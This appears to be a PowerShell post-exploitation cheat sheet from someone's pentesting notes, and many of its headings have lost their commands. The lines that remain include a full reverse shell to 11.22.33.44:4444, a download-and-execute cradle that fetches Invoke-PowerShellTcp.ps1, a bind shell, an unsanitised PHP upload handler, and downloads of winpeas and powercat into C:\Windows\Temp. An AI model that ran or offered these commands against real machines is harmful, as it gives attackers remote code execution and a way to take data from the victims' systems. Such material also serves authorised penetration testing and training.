PowerShell
from cmd to powershell
reverse shell (1)
Listener (On hacker machine)
On target machinepowershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('11.22.33.44',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
reverse shell (2)
Source of ps1 scripts
listener (On hacker machine) On target machine**powershell iex (New-Object Net.WebClient).DownloadString('http://11.22.33.44:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 11.22.33.44 -Port 4444
bind Shell
setup listener on windows box
powershell -c "$l = New-Object System.Net.Sockets.TcpListener('0.0.0.0',4444);$l.start();$client = $l.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$l.Stop()"
run application
search command
list files
list hidden files
file search
Get-Childitem -Path C:\ -Recurse -force -Include *.txt
Get-Childitem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue -Include *interesting-file.txt*
Get-Childitem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue -Filter *interesting-file.txt*
read file
present data
save into file
copy and move file
download file
download file, but not save
upload file
**upload.php
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
search by content
show services
get-service
get-service | where-object -property status -eq running
get-service | where-object -property status -eq stopped
Get-WmiObject win32_service | ?{$_.State -like 'Running'} | select Name, DisplayName, PathName
current working directory
check if file exist
get list of users
get list of user with details
get details of user
list local groups
get IP address
get all process
list scheduled tasks
get owner of
unzip
check .Net version
file transfers
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://11.22.33.44:8000/winpeas.bat','C:\Windows\Temp\winpeas.bat')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://11.22.33.44:8000/powercat.ps1','C:\Windows\Temp\powercat.ps1')"